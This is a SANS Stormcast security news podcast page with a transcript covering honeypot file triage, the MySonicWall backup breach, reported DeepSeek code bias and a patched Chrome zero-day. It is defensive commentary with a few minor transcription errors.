Podcast Detail

SANS Stormcast Friday, September 19th, 2025: Honeypot File Analysis (@sans_edu); SonicWall Breach; DeepSeek Bias; Chrome 0-day

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9620.mp3

Honeypot File Analysis (@sans_edu); SonicWall Breach; DeepSeek Bias; Chrome 0-day

00:00

My Next Class

Application Security: Securing Web Apps, APIs, and Microservices	Las Vegas	Sep 22nd - Sep 27th 2025
Application Security: Securing Web Apps, APIs, and Microservices	Denver	Oct 4th - Oct 9th 2025

… more classes

Exploring Uploads in a Dshield Honeypot Environment
This guest diary by one of our SANS.edu undergraduate interns shows how to analyze files uploaded to Cowrie
https://isc.sans.edu/diary/Exploring%20Uploads%20in%20a%20Dshield%20Honeypot%20Environment%20%5BGuest%20Diary%5D/32296

Sonicwall Breach
SonicWall “MySonicWall” accounts were breached via credential brute forcing
https://www.sonicwall.com/support/knowledge-base/mysonicwall-cloud-backup-file-incident/250915160910330

DeepSeek Bias
Cloudflare found significant biases in code created by the Chinese AI engine DeepSeek. Code for organizations not aligned with China’s politics contained significantly more bugs
https://www.washingtonpost.com/technology/2025/09/16/deepseek-ai-security/

Google Chrome 0-day
Google fixed an already-exploited vulnerability in Google Chrome
https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop_17.html

iTunes

MP3 Download

RSS Feed

Google

Podbean

Amazon Echo

YouTube

Spreaker

Spotify

Discussion

Application Security: Securing Web Apps, APIs, and Microservices	Las Vegas	Sep 22nd - Sep 27th 2025
Application Security: Securing Web Apps, APIs, and Microservices	Denver	Oct 4th - Oct 9th 2025
Application Security: Securing Web Apps, APIs, and Microservices	Dallas	Dec 1st - Dec 6th 2025
Application Security: Securing Web Apps, APIs, and Microservices	Orlando	Mar 29th - Apr 3rd 2026
Network Monitoring and Threat Detection In-Depth	Amsterdam	Apr 20th - Apr 25th 2026
Application Security: Securing Web Apps, APIs, and Microservices	San Diego	May 11th - May 16th 2026

Podcast Transcript

 Hello and welcome to the Friday, September 19th, 2025
 edition of the SANS Internet Storm Center's Stormcast. My
 name is Johannes Ullrich, recording today from
 Jacksonville, Florida. And this episode is brought to you
 by the SANS.edu graduate certificate program in
 penetration testing and ethical hacking. In diaries
 today we have a post by one of our undercredited interns,
 Nathan Smisson, who did look at the download directory in
 our Kauri honeypot. That directory can be a little bit
 overwhelming for someone new to investigating honeypots.
 And it's really important to sort of find quick methods to
 triage what's there and quickly find patterns. One of
 the very common patterns is something that Nathan is
 looking at here. And that's where the bot has a small bash
 script that first downloads the actual bot then for
 multiple architectures and executes them, hoping that one
 of those will work on the architecture on the particular
 attacked victims system. Overall, this is something
 that you'll see a lot in honeypots and definitely
 something to sort of be familiar with if you're trying
 to sort of work your way through a lot of these
 detects. And in the past we had a lot of SonicWall news
 and suggestions that it may be zero days or that maybe
 firewalls were re-exploited after being exploited in the
 past and well credentials being leaked by the firewall.
 Turns out that there was another thing that well we
 didn't quite consider yet. And SonicWall published an
 advisory now that they found a good number like five percent
 of their customers had their MySonicWall account
 compromised. This was again a password brute force, so not a
 real vulnerability I guess you could argue within MySonicWall
 other than maybe preventing brute forcing. I'm not sure
 what mitigations they had in place for that. But the result
 was that customers who had their MySonicWall credentials
 brute forced, well had then their backup files
 exfiltrated. This is an optional feature in SonicWall
 so you may have disabled that but it's also sort of the
 preferred backup method for a number of their models. So
 what you have to do is you have to go to the MySonicWall
 account, check if you're you are backing up to MySonicWall.
 Also SonicWall has published a list of affected serial
 numbers that you can verify. The actual firewall
 credentials were encrypted as SonicWall states. Could be
 hash that's often really not that well differentiated in
 announcements like that. But if you have a relatively weak
 password you should of course consider that it will get
 brute forced then offline as an attacker gains access to
 these configurations. And of course these configurations
 may have unencrypted data in them that does make it easier
 for an attacker to target your particular device. There's
 also sort of an incident playbook that SonicWall
 published that you can follow. So if you are affected by this
 again minimum requirement is reset all passwords. If you
 happen to reuse these passwords on other devices
 even if those serial numbers are not affected you should
 also reset the passwords on those devices. So definitely
 make sure that you basically start from scratch with your
 SonicWall configuration and follow SonicWall's advice. And
 the Washington Post today is reporting research by
 Cloudflare that DeepSeq apparently is writing less
 secure code if it's used to write code for purposes that
 are not aligned with China's main goal. So for example
 Falun Gong or Tibet related organization should expect
 less secure code from DeepSeq. This is an interesting result
 and the numbers they're reporting here in the
 Washington Post report are pretty telling kind of it's a
 pretty big difference. Of course a lot of questions here
 there are no direct prompts or code snippets being shown here
 so it's hard to compare that against other similar engines
 to see what code they would produce for these prompts. One
 suggestion being made is that this may not just be
 intentional but also something that's based on the more
 focused training data that excludes some of these causes
 of course from DeepSeq and from its knowledge base. So
 not time to ensure what to make of it and I think there's
 maybe more to this story than just sort of the headline here
 but still something to consider and definitely you
 know when you are using these models to code you must
 consider the prominence of the model and well what it's made
 for and who it is made by because you do have a lot of
 trust in the code that's being created by these models. And
 then we got a Saturday vulnerability in Google Chrome
 that was patched today before you go home for the weekend
 you probably want to make sure that you at least restart
 Chrome in order to apply any pending updates but also take
 a moment and make sure that you are on the latest version
 after you restart it. This particular vulnerability has
 been reported being exploited it's a type confusion
 vulnerability in Google Chrome's JavaScript engine V8
 and well we had plenty of similar vulnerabilities before
 so once details become known and the patches are diffed
 it's like a that we'll see more exploitation of this
 particular flaw. Well this is it for today so thanks again
 for listening thanks for subscribing and liking this
 podcast. I will be at the SANS conference in Las Vegas next
 week so say hi if you see me and I'll always keep some
 stickers on me and if you can't make it to Vegas I will
 be in Denver Denver and in Dallas for the remainder of
 the year so one event in October and one in early
 December. You can always find future classes I'll be
 teaching in the show notes at the same page there. So that's
 it for today thanks and talk to you again on Monday. Bye.
 чик